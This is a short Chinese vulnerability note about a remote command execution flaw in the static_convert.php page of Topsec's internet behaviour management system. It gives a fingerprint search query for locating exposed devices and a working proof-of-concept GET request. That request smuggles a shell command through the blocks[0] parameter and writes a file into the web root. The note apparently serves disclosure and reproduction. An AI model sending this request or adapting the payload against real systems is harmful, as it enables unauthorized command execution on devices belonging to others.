漏洞简介
天融信TOPSEC Static_Convert存在严重的远程命令执行漏洞。攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。
上网行为管理系统
资产
app=”天融信-上网行为管理系统”
复现过程
POC
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'pstvamqlkzrgslfilwvf'%20>>%20/var/www/html/rrlmkkyopirhaviko.txt%0A HTTP